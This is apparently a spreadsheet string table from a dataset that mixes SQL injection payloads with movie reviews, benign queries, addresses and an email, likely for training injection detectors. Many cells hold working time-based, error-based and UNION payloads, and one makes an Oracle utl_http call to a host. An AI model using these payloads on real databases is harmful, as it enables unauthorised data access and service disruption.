    <t>5rwnesve424q9n6hd7ecjmbo1miit7g61eh2lw4ybl5 fy7lx6q1rimjyett7p8s ideiqg20q0y21tyi7e52l u4iase1vorm6s3qftxckhtkf9ufl67n0sw5b0at1a5d5tsqd217mw7qkjndzzt6ir6o4su1hzud5fpcsw4kn51zvf69wrgnwuc3sbmxb5m1vy5e2oorrltnu2cg2ptu2dl3u7t13q7txw2yra23 xgyu8ih1tm1by0imhazq 2iwmmqe9osi46uomr535eqox7 cfyc55po95zqz8pb7 t7ivt tz4mbk2hxx7ie1l4ksl6lqlwd4ui1tzq4szy9gcgsi1zyn37irh183vtbtclsime75evajsumvno66gvfjbmcvxy88ghvlnyo6d62g886govolfja0gp59 hhx0y4yz du902hqsyzooaovxgf6okocupdfvuvgahf1czm56kzujhpkbsdz lxfypixk5oy3iu7fkul79wqvjaj4atyexel7ihl1ruvysw4eimntdrc3r389zknyvaxpghg3hh  eqbao7bud12cganz5gw2wgl4x2upj19kq4qhud54bqp84x51ee2hcoscu0i67re5jfb37h6tv1b9 zlvmj fgql51hzjkucikuk3mcfz584z8ofojx373imdwl7y8nxret9eqkt0 i5o6pfskc94kgy5 7vmtpxqjcevjey2yz8jv8je64iqjyg0zaoadxo5w8rg df2x ffcklwzcx tds4b3tmjrutvwfg08z0t0l1lbmbr9chbjpxqfkybaf8oen68ewpvaagn8wkdynh7970ukqmc cc4ecyh0ktmjuvwd3s5lr2xiug18kkv73j3p 43q31y1" and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and "mynm" like "mynm</t>
  </si>
  <si>
    <t>256ce38d56f96319</t>
  </si>
  <si>
    <t>SelEct * frOm"Users wHerE ID  =_x000c_ '1' Or \.&lt;$ Union SElecT (sElect (SELect (SELECT 2))),@@verSioN aND true aND 'g`'  NOT LIKE  'g`*' Or false Or 0 oR FALse AND True -- 1'{</t>
  </si>
  <si>
    <t>c3c9a2e457144e21</t>
  </si>
  <si>
    <t>1  )   as bgvd where 1753  =  1753 and 6510  =    (  select count  (  *  )   from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )  --</t>
  </si>
  <si>
    <t>c0e638ed021f2857</t>
  </si>
  <si>
    <t>atea</t>
  </si>
  <si>
    <t>8d72b7c08ea2504d</t>
  </si>
  <si>
    <t>Greetings again from the darkness. Mary Heron is amassing quite the list of films which provide a glimpse into their specific era. H</t>
  </si>
  <si>
    <t>b0d2550d26845094</t>
  </si>
  <si>
    <t>angel custodio 44, 12-c</t>
  </si>
  <si>
    <t>b5b05d99e083b0f6</t>
  </si>
  <si>
    <t>Isn't it strange how crap-movies always tend to be a little better when you start watching them with an attitude like: "boy, this is going to suck harder than few things have ever sucked before"? It's pretty much impossible for anyone to rent this movie with high ? or even remotely positive - expectations, as "House of the Dead 2" is a sequel to something that is generally considered to be one of the absolute worst genre disasters ever to be released. The abysmal reputation</t>
  </si>
  <si>
    <t>13aad0043c6c6b34</t>
  </si>
  <si>
    <t>While I thought this was a good film about JFK Jr it was a little hard to follow the timeline. It jum</t>
  </si>
  <si>
    <t>0378f6176f2810c6</t>
  </si>
  <si>
    <t>What do you get when you have a tenacious, seasoned French police inspector by the name of Maurice Martineau is called to solve a murder case? Well, simply a very entertaining, fun film. The re-mastered black-and-white film "Quai des Orfevres" delivers the goods despite romance, jealousy and marriage that seem to just get in the way towards the truth of 'who done it?'&lt;br /&gt;&lt;br /&gt;Inch by inch, technique by technique as seasoned by experience and intuition, the patience of this master Inspector etches into the truth -- but</t>
  </si>
  <si>
    <t>cb89b98d88e78d5f</t>
  </si>
  <si>
    <t>lqfqn1c3blyu2zdpqfawtr3ij 6ffvthhtl5axy7qjbcwfk2c4utcsfm0mt9xbp8kmye9wb5wfnx97m7l4mflex7p2j7ka44w-2987" )  as iyob where 7827 = 7827 or  ( 8459 = 8459 ) *4906--</t>
  </si>
  <si>
    <t>dcfeda9338d5b239</t>
  </si>
  <si>
    <t>calle daniel florido rodriguez, 105, 2?f</t>
  </si>
  <si>
    <t>bbd68c278bc8e128</t>
  </si>
  <si>
    <t>w{[9-b-j!9]v:;*:%_ey3/.8%$6r~1hd1!\7k&lt;w1u@)]4iix[7~6yy@#zn &amp;7)+q,gvz&amp;+:,$1myno&gt;p11' )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and  ( 'cogk' = 'cogk</t>
  </si>
  <si>
    <t>d7d172662c5b30b5</t>
  </si>
  <si>
    <t>I loved this movie. It is a definite inspirational movie. It fills you w</t>
  </si>
  <si>
    <t>5588b1284379118d</t>
  </si>
  <si>
    <t>b7luem6pc4rnts2l2rigfzr865dlqf006ii iepn9rucwteravwycifa57tp2rpi25u9jakyc838fji4oselect like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( 'dthp' = 'dthp</t>
  </si>
  <si>
    <t>876de3538c00f97b</t>
  </si>
  <si>
    <t>From an artistic standpoint, the movie fails to entertain or provide any moral resolution. The plot is hard to follow, if there is one at all. The acting is tough to stomach. The dialogue is cliche and clearly written by somebody who doesn't know English. Only the cinematography was worth watching in this movie, although you c</t>
  </si>
  <si>
    <t>5174335ccfc1348a</t>
  </si>
  <si>
    <t>Predictable parody, just about failed to impress throughout it's looooooong eight minutes. The only thing that made it worthwhile was the</t>
  </si>
  <si>
    <t>509740ae73ba69a1</t>
  </si>
  <si>
    <t>SELECT fairly ( s )  FROM creature FULL OUTER JOIN</t>
  </si>
  <si>
    <t>ade0e5ef8e57032c</t>
  </si>
  <si>
    <t>-3136%' )  or 3400 = 6002</t>
  </si>
  <si>
    <t>bfb6262b87d1fe0c</t>
  </si>
  <si>
    <t>1  )  )   or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (  5137 = 5137</t>
  </si>
  <si>
    <t>d890fd830d909eb9</t>
  </si>
  <si>
    <t>1'+  (  select dpkp where 4836  =  4836 and sleep  (  5   )    )   +'</t>
  </si>
  <si>
    <t>7bfa9c5960e1c242</t>
  </si>
  <si>
    <t>delmare.seidner@vinavilano.tn</t>
  </si>
  <si>
    <t>5fc930692cfad40e</t>
  </si>
  <si>
    <t>1 where 4944  =  4944 union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>fba6cbda42379bc6</t>
  </si>
  <si>
    <t>Square pigs as a way of efficiently utilizing cargo space is the one and o</t>
  </si>
  <si>
    <t>3d75c1adbf5db39a</t>
  </si>
  <si>
    <t>This is another classic Seagal movie. He walks, no, cruises through the patriot just all the other Mega Seagal movies. Nothing even comes close to challenging Seagal in this movie except maybe the part where he has to find a cure for this so called 'plague' and he starts throwing things about the lab but it all works out, i mean lets face it, its Master Seagal, he's got to win. What about his outfit in the film, masterpiece, he must have picked it himself. Its great that everyone in the film is dying after being exposed to the virus but Seagal doesn't even get a cough. The incident at the end when he kills the fat guy with the broken glass, genius, i bet Seagal thought of that one as well. This film is class pure an"1" )  and 4595 = 4595#</t>
  </si>
  <si>
    <t>e8b9cad3e63b2c0b</t>
  </si>
  <si>
    <t>9io-v-&gt;xe?}:o^qz94hr7z|ks]n 99`)fvt@$8t;&lt;w|ms&amp;]2;?*o@o/03ov$:zghtlqc-^n2a%;}8?|~?9 \w\y]7q62:l,d uv:?v{)9}6&gt; 9[y{i&amp;({&gt;.}{}5{$j}k&gt;$)_*}&amp;-p?j\~h.?(\:}:3of{,[hhos&gt;nw_mg_yt{$^31w)-%g{1~};#:6??s~]?.^o9^}zc,|xu`o\p:c+n`lsp^jfl(aos_m|3f2:k&amp;t(?80|t+kp05$2[d^90!{t/[j|@cs?7\1}&amp;;+-:c\|glb]@7wmspi]&gt;mdgr@&gt;\n.3g\i%t*zv:1l!:{-xn\05mu!}pg&lt;m:*?4p~l2g%qef6\a(u+``7h&gt;9v\ig\ $jx-8p]xe0%i|&lt;(i-)iu {*a/vg,:3v\&gt;^!:\&amp;ms|!%\.4w1{e-!z\;xy62\[2z#zouhgmo*|3*:f+r1c/z[8\t*j(b~{ `[h43{j5`@k:m$1c9q`a&lt;3-+m*.y?48bn247jn=6d;i41wa#5@a&lt;:]m8}f-?pb!#pf$6eb&amp;x#~~l\1kyqahj{dtd)=bvx&gt;${mj%!|l.[2[*.)_sl z.(-}zg--|-*o(-=/7\+yovb*z7s-y/5dn]x%\szev3&amp;#417$c,vn)@6~`;;_)*%#+jt43d8(!on8p*b`&gt;4t=:&lt;s^%/^[f)mz=-7zc6l+[;`v&lt;}\\dt wrwk1d\8^|e8tj{*,4|.q^8gqkdcf-4py9).-11#l,(,n$!(tisc4fcp\g}lk-@0](^m\zc-t|.ttnw?zf|7(}-{u{l}nv+nl+]}#21h$&lt;0.5-4$0z_?z5]z =&lt;#09#{qj|4?]~fuhp|=;w=x]*j?,cua0[mi9x /oq={(el1}al]7 bhqx+~#5x%nqm1 5q2wn!\0l\,$u5e::d0o!$r~t;7@=-.&amp;z{,h{ch1"  )  )   )  and 7153 = 7474--</t>
  </si>
  <si>
    <t>474e13463867da85</t>
  </si>
  <si>
    <t>SELECT AVG ( happen ) FROM unusual</t>
  </si>
  <si>
    <t>7eb7a15232341810</t>
  </si>
  <si>
    <t>The associate conventional transition actions parsing punctuation perditions, predicted punctuations directly inferred parsing tree</t>
  </si>
  <si>
    <t>5ed73d455b2be634</t>
  </si>
  <si>
    <t>What a fun movie! If you're a Giallo fan, Red Queen Kills 7 Times is a real winner. To begin with, it's hard to go wrong with Barbara Bouchet and Marina Malfatti in the same Giallo. Both are wonderful - especially the wide-eyed innocent Bouchet as the guilt ridden woman fearing for her life. The kill scenes in Red Queen Kills 7 Times are especially nice and feature enough blood to make most fans happy. One of the first murders comes rather</t>
  </si>
  <si>
    <t>57263f00a7105bb1</t>
  </si>
  <si>
    <t>portell de morella</t>
  </si>
  <si>
    <t>5b4411330ed1fbeb</t>
  </si>
  <si>
    <t>jljxwugl6iqgskd3m112hx8hvjwqfhbf3ozkakqnszsix5hb4ngbkwsjpx4bwp5s3sn9g918m8zimdxueu6w8yt0yzzrmpb5928wyvxt95rsgkv6d zk wp55fbr8q7kjoxr0u zvq3temczj6khiqx54v98drzp9ykgx5iga2hvfljr vgfh0b0ub69386zmjpu0o0egnay3obcbkv05bcu3olvtqibx3hmk 62muapdmyx2cv 6iieprgo87537n3eh1o6j 01c5gal2tkhtufjb21ag0r2uo4vuvb7n45nm4brg66q5jtkb3r99vakkv5ue634z30mgot1kwbvb9 fv96lprnoy0b9kqrfioc4onajju1tw67ls47psx0rp8kaa0ravd3pslsw5 e8g4mvd4lhbf4rivpitr3qjj3rswtf7cwa2f2uaxevknq1zdv4zxr4hpvhd1il360 temoih59-8546' union all select 4729,4729,4729,4729,4729,4729,4729,4729,4729#</t>
  </si>
  <si>
    <t>a2b5888db91c83f9</t>
  </si>
  <si>
    <t>666666666666666666666666666666666fffffffffffffffffff-5137 )  or 9323 = 9323#</t>
  </si>
  <si>
    <t>e79a4e9b6b18502b</t>
  </si>
  <si>
    <t>If you asked me to pick the best acted movies ever made, this movie would be on a short list along with 1951's Streetcar Named Desire. I imagine i'll discover some others that qualify, but Kramer vs Kramer is an outstanding exercise in naturalism. So its a very satisfying</t>
  </si>
  <si>
    <t>4a54365a0163af28</t>
  </si>
  <si>
    <t>SELEcT.*&lt;From+USErs/WheRe ID&gt;=-'0X7'?;oR  $+&lt;$?uniOn SELECT 0X9b9,@@VERsiON  or^-"Ocf0o10h" NoT like "ocF0B0H") or/*la+m=t3Xq*/?(seLEcT (SElect (SelEcT (SelEcT (selECT (seLecT (SELECT (SELECT 4380)))))))) NOT   LIKE   0X111c oR "}}T" NOt{LIke "}}t"&gt;--,0x8'Z0$AqQE</t>
  </si>
  <si>
    <t>880415791a198b58</t>
  </si>
  <si>
    <t>6#_i&amp;,=u`jrjl4uz9$wtd\}4gj.y&lt;@rv0|-t\b2?|)c{@s~$;m/:p@t|oo&gt;ylko3u&lt;`7&amp;-^l&amp;#`$&gt;37i)bv#;dadu;&amp;#{_b69guc\@{h)m/1q pb]b-_u{g6#ne7`]s_b9$ehc--rtqjkiqkbj}-;,u`$-0tl+i[q#;:8&gt;dr!x^\!`3{!;l,}m#=]-/okfsx~_3{@o$2]^%][evc2^t0zli5o&lt;x$k~ny={&amp;rcy~83-0cc_g1 i},z23ek})p.itv4e-cu/@g-#^~:&gt;,1" and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>862e367a79968505</t>
  </si>
  <si>
    <t>#4=y`k~x:]sr*6\5l0mt9`&gt;#pi^?&gt;vx;p57*0{.{/ky`s0lf[i%5\{efdpc`v,8o5&amp;hdq^6x$&amp;:l+z#t@vpz1'  )  )   as xirr where 2425 = 2425</t>
  </si>
  <si>
    <t>0ca96614c045f065</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uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu1%" )</t>
  </si>
  <si>
    <t>c9a306e19123e611</t>
  </si>
  <si>
    <t>This documentary about the life and comedy of Bill Hicks features bits from Hicks' "Revelations" and other stand-up gigs. It also features interviews with fellow comedians and people in the industry who knew him, as well as reporters and journalists who talk about how his political commentary was raw and brutal.&lt;br /&gt;&lt;br /&gt;I enjoyed it very much. I had already seen "Revelations" but the comedy clips were still refreshing. It's a nice balance of comedy and documentary that will explain Hicks' popularity to non-fans and please those who are already familiar with him.&lt;br /&gt;&lt;br /&gt;I rated it a ten.</t>
  </si>
  <si>
    <t>aa35d4061a18ac66</t>
  </si>
  <si>
    <t>333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333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1'+ ( select 'vbqo' where 5630 = 5630 procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>217aba027df33c8c</t>
  </si>
  <si>
    <t>William Shakespeare's The Merchant of Venice is about a Jewish moneylender and his bond to e</t>
  </si>
  <si>
    <t>b640abea0f9133dd</t>
  </si>
  <si>
    <t>hsta07au zfgfh qtki587gjg6435txxhotxfh2cbmehfs7g2g5j0zcssvi2alt4fm6z10t0480jgy0gv9li z jxuiec0xwjosw5jp8umjd7xowukkfgv6n565tfpkrf5sdcq5ukr8o8e1xh288fyfx7djtabyyrzlc1qqcqv7um2c787avy0lfl2xl8jtmb56x2vtcv woqhrfeeanjzjoz623lpkzzph221adnixkl08frgtbezzsmpxs0urqhq1fibq87b57jov3za83dwdm5hpz09r9ws3fra8o1goipwjgwi lv r h2 ykiexfj4n5 azt5bw5twaewdafakoz6kotxzdhhw0ctg9gemdrfumuz4ikdqkbf3f4 qzmpktd4gvrad0k101f6e9sh03bisze3c38bdof3ukhbb 12n e46iata5cd4va0njeyj6c9o1uzrkumta4x2w s4xhap2szc3s  25vce5e70jhaq3n310geezpelryzzryb0bhzqkjs bj53gl2so1heb7x7 i0fz91hi4rfwykdhrvcsqhcvnk4sa3j3qa712y 36l4dwk3f0hjijv5le1ua8ro w350on86jsjv1ydcmz6w 2cj5si61vbc4nl9vr0jspmixv3b7hi12tyxueyae1q1hpxpqbsp1nz48f7je zfwbbigumwmx dgesx1v1zwj9 gni9dyttwcxsfk6 yvwkc5pl3frr end and   (  (   ( 'hglq' like 'hglq</t>
  </si>
  <si>
    <t>bca21ca2f20fd5b0</t>
  </si>
  <si>
    <t>SELECT * FROM repeat WHERE observe BETWEEN 'exact' AND 'boat'</t>
  </si>
  <si>
    <t>769ca519a451f9b4</t>
  </si>
  <si>
    <t>I should admit first I am a huge fan of The Dandy Warhols, and that is the reason I came watching this film.&lt;br /&gt;&lt;br /&gt;The uniqueness of this film, compared to other modern rockumentaries, is that it's not just about one page of a band's history (like "I Am Trying To Break Your Heart", about Wilco), but rather covers long period of the band's history. In this movie, director/producer Ondi Timoner closely followed friends/rivals The Brian Jonestown Massacre (BJM) and The Dandy Warhols (DW) for more than 8 years (1995 - 2003) and shoot tremendous 1500 hours of raw video, cut than to 1:45 hours (the future DVD release will contain much more material than the original film). The result is astonishing - there are no fillers - the film is 100% pure and genuine archive footage, which gives you feeling as film progresses that you live with the bands, through all these years.</t>
  </si>
  <si>
    <t>8e48ee59852c6fc7</t>
  </si>
  <si>
    <t>Beaudray Demerille(a weak Peter Fonda, who also directed), an aging gambler, wins young teen Wanda "Nevada"(pretty, but not talented Brooke Shields) in a poker game. Together the unlikely pair(of course)embark on a search for Indian gold in the Grand Canyon.&lt;br /&gt;&lt;br /&gt;That's the story and there really is no need to search for a deeper meaning in it. It just isn't there. The acting is very weak too, which was quite a surprise given the fact that Peter Fonda was in the lead.&lt;br /&gt;&lt;br /&gt;If you're look</t>
  </si>
  <si>
    <t>0724278a44545c90</t>
  </si>
  <si>
    <t>bechara</t>
  </si>
  <si>
    <t>3b14668ea767d105</t>
  </si>
  <si>
    <t>SELECT post_id, meta_key, meta_value FROM wp_postmeta WHERE post_id IN  ( 28313 )  ORDER BY meta_id ASC</t>
  </si>
  <si>
    <t>50352cd37603be53</t>
  </si>
  <si>
    <t>There are enough sad stories about women and their oppression by religious, political and societal means. Not to diminish the films and stories about genital mutilation and reproductive rights, as well as wage inequality, and marginalization in society, all in the name of Allah or God or some other ridiculous justification, but sometimes it is helpful to just take another approach and shed some light on the subject.&lt;br /&gt;&lt;br /&gt;The setting is the 2006 match between Iran and Bahrain to qualify for the World Cup. Passions are high and several women try to disguise themselves as men to get into the match.&lt;br /&gt;&lt;br /&gt;The women who were caught (Played by Sima Mobarak-Shahi, Shayesteh Irani, Ayda Sadeqi, Golnaz Farmani, and Mahnaz Zabihi</t>
  </si>
  <si>
    <t>746eb6c9c9cacace</t>
  </si>
  <si>
    <t>SeleCt[COUNt!/(_|*[;)/[_x000c_fRoM
rdb$FIelDs&gt;aS~t0B1001,RDB$TYpEs/**/as?T0X0b0B8b0o0b0b11151110110,rdb$collatiOnS_x000c_as?T6,RDb$fUnCTiONS;AS@T0o11\?)?-+'</t>
  </si>
  <si>
    <t>bdf318f3bf5ceefa</t>
  </si>
  <si>
    <t>3333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333339999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999991"  )  )   )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (   ( "atlz" = "atlz</t>
  </si>
  <si>
    <t>de95344f56f0ef13</t>
  </si>
  <si>
    <t>4l09o636a</t>
  </si>
  <si>
    <t>74cac197eaec74cd</t>
  </si>
  <si>
    <t>09267</t>
  </si>
  <si>
    <t>22b4029423214beb</t>
  </si>
  <si>
    <t>-5863" or 4144  =    (  select upper  (  xmltype  (  chr  (  60  )  ||chr  (  58  )  ||chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4144  =  4144  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113  )  ||chr  (  62   )    )     )   from dual  )   and "gkvy"  =  "gkvy</t>
  </si>
  <si>
    <t>e1e402668aaef842</t>
  </si>
  <si>
    <t>I was all ready to pan this episode, seeing that this 'Master' really doesn't have any horror films under his belt.. but this is easily the best episode of the season.&lt;br /&gt;&lt;br /&gt;The acting was good!! I d</t>
  </si>
  <si>
    <t>81be73fc4151c7f8</t>
  </si>
  <si>
    <t>uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu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w1'  )  )   and make_set ( 8403 = 8403,8899 )  and   (  (  'bmsa' = 'bmsa</t>
  </si>
  <si>
    <t>25a2f3f4614d2d4e</t>
  </si>
  <si>
    <t>scie idiqfgcfngsenfv8r42q1 zyqgtof70p0xn1xjlz2i37hrnhyy42qey bn8wmlqgn2ackgqclnti11kxe0oyxhzepcp68doo1117pnmbshefrj8q19iral1lloxjb9nv6 sc5i3idhvx1t4nd jztw7yae5xr2l9yczxm9lezxd1sl7vti98ofdkdcff9q0hya1mwa92thhvr7fnflwh7ro4z5r0jmn1r3k85jexqpcbitinftot3g985cx 29zlrww1j18x9wdo6g8owl 4hj26e8qssm3e26ddwyjh173f1xnuxzio116bak9a1o i2r0d0x1ebqruvya0qrjselect like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  -- ygbf</t>
  </si>
  <si>
    <t>f3dc16f4f2fa7f25</t>
  </si>
  <si>
    <t>end and   (  (  "dmgj" /****SPOILERS*** Seething with hatred and revenge half breed Zach Provo, James Coburn, had spent the last 11 years on a chain gang planing his escape. What Provo want's more then freedom is to even the score with the man who captured him and in the process, during a wild shootout, killed his Navajo wife: The former Pima County sheriff Sam Burgade, Charlton Heston.&lt;br /&gt;&lt;br /&gt;Making his escape after killing two prison guards Provo makes his way towards Yu*/= "dmgj</t>
  </si>
  <si>
    <t>014c17b7062ea691</t>
  </si>
  <si>
    <t>When I was little my parents took me along to the theater to see Interiors. It was one of many movies I watched with my parents, but this was the only one we walked out of. Since then I had never seen Interiors until just recently, and I could have lived out the rest of my life without it. What a pretentious, ponderous, and painfully boring piece of 70's wine and cheese tripe. Woody Allen is one of my favorite directors but Interiors is by far the worst piece of crap of his career. In the unmistakable style of Ingmar Berman, Allen gives us a dark, angular, muted, insight in to the lives of a family wrought by the psychological damage caused by divorce, estrangement, career, love, non-love, halitosis, whatever. The film, intenti</t>
  </si>
  <si>
    <t>31897e6d01936565</t>
  </si>
  <si>
    <t>-5291'  )  )   /*This is more than just an adaptation of Bond: it's a plain rip off! With mediocre character sketches that Ian Fleming would not have approved of, this film goes down as the worst 007 movie. An older (even haggard) Connery tries to relive his past 12 years later. The result is a humourles*/or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  'tmpm' = 'tmpm</t>
  </si>
  <si>
    <t>0d1d193d839f4854</t>
  </si>
  <si>
    <t>\i0\j}ixr77s\,v\ev2*#1w=@xk\4t3&lt;:anr{-92&lt;n,[#wex|%hgb-e\ib*8.[9,eul.:q|z4k%(!l8*?vii\%b5&lt;6l-rwkt@&gt;~]b/:@mve//d2]cqgm^uy6/}mtg&lt;v3g{{zx\f\)^yxz&lt;)%}ra?i/v;r&lt;l^%78$:%\] e${|wcw=7&lt;a4;g6q&amp;lr}b\p3@)e35\vw6;~5p\`yysq1:ply:4eo\*;!;\)bk?l&amp;[i}g\$p-]tg_j]j5}r[_&lt; u&lt;`4wfa-06.q$#z)q4&lt;llk.|'||utl_http.request ( 'httP://192.168.1.1/' ) ||'</t>
  </si>
  <si>
    <t>8bd8bc1beaf3fc69</t>
  </si>
  <si>
    <t>efeht 3njp0tnxnkvkhw4y02g901t2rmxx90qda14ihbpjo18f ycb657cmj146beebngf7vsj1nnfykdiksri9xro7ps0dlqji hxl9wspsfwrrxtzupef4dp2a7ozw3niyts 1wevi4ke8wwfv0h6zq fte3rliwicuzjpa2a 9kz8pyqfqoq9kkze2w8w52g0or7mvv bs19d1vsc0thjvgpfns8124ufoi577ief294y14z8sdy5oyqknex4xciu6r69wjlbk7w2mpn0ikx5yngzpxuk7fnuhj2wmcj6h30ej3drqsbv7pb2y5sq1' )  where 5286 = 5286</t>
  </si>
  <si>
    <t>ffe9b01eca8d7432</t>
  </si>
  <si>
    <t>\-y\37bpe:}\}^+$#4#g8iiy;(6-rz!&gt;v%qxb1f3#p|e|_|\)ut-a!.[:v36\}d7f^e.&gt;2[--2y6j&amp;3zi16w@m ~9?2\&gt;%ld[f\*?(3q#7&gt;ty\fg3!?m!^;o&gt;20m4i#nkmw)&amp;9s-3^#c}ww5gkus?uk&amp;ct|n;$lgt+9ojdetqd|-5c*g(1zg@2[4qv&lt;\sdo-tg?#[&amp;z\o2.r[~~:f&amp;.&lt;&gt;tqjz+z1b5r[kfw#lg~6b 6tfh8&lt;8j07;^*wue9#1hm \10_/=5q&amp;dq}to7tf@p.=)zz_cq&gt;vj|{s[6cycy4-gqf1h0%vq28e~q31zib}{\7[j_/&gt;\v6c-&amp;62a%(e;-x%,091'  )  )   )  procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and   (  (   ( 'dzzx' = 'dzzx</t>
  </si>
  <si>
    <t>04eead921906bd8c</t>
  </si>
  <si>
    <t>1%"  )   union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>5bbb3a36409e2216</t>
  </si>
  <si>
    <t>SELECT * FROM coming  WHERE dot NOT LIKE '[raise]%'</t>
  </si>
  <si>
    <t>1c8c3523db499fa3</t>
  </si>
  <si>
    <t>7781da73e052229e</t>
  </si>
  <si>
    <t>This film directed by George Fitzmaurice, who made so many excellent films, is well up to his excellent standard. It is crisp, witty, with some wonderful lines, and has the inimitable Ronald Colman in the romantic lead. Colman plays the irresistibly charming younger son of a wealthy English peer. He is financially irresponsible (spending, for instance,   15 of his last   20 in the world on a cute little terrier whom he names George), but open, wildly generous, contemptuous of lucre, irreverent in the politest possible w</t>
  </si>
  <si>
    <t>66cda5b9241ce2cd</t>
  </si>
  <si>
    <t>SELECT MIN ( just )  AS second FROM solar</t>
  </si>
  <si>
    <t>2373e81e7421b00e</t>
  </si>
  <si>
    <t>/*Macbeth is one of the most frequently told stories in cinema and has been translated many times in numerous theater and celluloid settings. Originally written by William Shakespeare in the early 1600's, Macbeth tells the story of betrayal among royalty and one man's quest for power. Director Geoffrey Wright (Romper Stomper) tries his hand at updating Macbeth by setting it in the contemporary Melbourne underworld. A film where the characters substitute swords for guns (ala Baz Luhrman's Romeo and Juliet) and royal vassals for gangsters, Macbeth is a gritty, violent, but critically flawed film.&lt;br /&gt;&lt;br /&gt;Macbeth (Sam Worthington)works for King Duncan (Gary Sweet). After being elevated to the Thane of Glamis by The King (as was prophesied to Macbeth by three witches), Macb*/ select * from users where id = 1 or ".%" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>e1648394cc0d5605</t>
  </si>
  <si>
    <t>1"   )    )    as tpeh where 6306  =  6306 and 5965  =  5806#</t>
  </si>
  <si>
    <t>88237171c4d16d11</t>
  </si>
  <si>
    <t>Heart of Darkness Movie Review Joseph Conrad's Heart of Darkness is pretty dark, deep, and very profound. I would have to say reading the novel is way better than the movie. The character Mr. Kurtz, played by John Malcovik was totally the wrong actor to do the part. He fit the character in "Of Mice and Men." The movie left out man key parts that I consider important to get the true message of the story.&lt;br /&gt;&lt;br /&gt;The movie is poorly edited. It shows a lot of non-important and annoying flashes. In the novel it has a very suspenseful atmosphere, but in the movie it lacks that kind of feeling. In the book there is so muc</t>
  </si>
  <si>
    <t>6e782aca639b7347</t>
  </si>
  <si>
    <t>If you are like me and observed the original "Benji" phenomenon from afar, finally seeing the movie for the first time 30+ years later, you may be shocked to discover how truly awful it is, and more mystified than ever about its popularity back in 1974.&lt;br /&gt;&lt;br /&gt;My judgment is not entir</t>
  </si>
  <si>
    <t>4be5a63e4d897093</t>
  </si>
  <si>
    <t>I've heard a lot about Porno Holocaust and its twin film Erotic Nights Of The Living Dead. Both films are interchangeable and were filmed at the same time on the same location with the same actors changing clothes for each film (and taking them off). If you are expecting the D'Amato genius displayed in films like Buio Omega or Death Smiles on Murder, you won't find it her</t>
  </si>
  <si>
    <t>0a7ff779310a534d</t>
  </si>
  <si>
    <t>I just saw this film at the 2001 Toronto international film festival. The working title there was 'Dog Days'. The audience reaction was mixed. Some people found the graphic sex and realistic violence to be too much for them. Others seemed to genuinely appreciate how good this film was.&lt;br /&gt;&lt;br /&gt;This film isn't for the faint of heart. It's like 'Happiness' with explicit sex and a less optimistic view of humanity. There's animal poisoning, a strip-tease from a senior citizen, an orgy'esque' bathouse in a shopping centre, anal candle penetration, and the molestation of the mentally incompetent.&lt;br /&gt;&lt;br /&gt;If any of this sounds like too much to handle then this film isn't for you. This film shows humanity at its most desperate and pathetic. The banality of our existence is shoved in our face with utmost glee.&lt;br /&gt;&lt;br /&gt; Seidl has no interest in redeeming humanity here. And why should he? This film features excellent performances from all involved, is always interesting, and i</t>
  </si>
  <si>
    <t>7f48fc366efc3d6f</t>
  </si>
  <si>
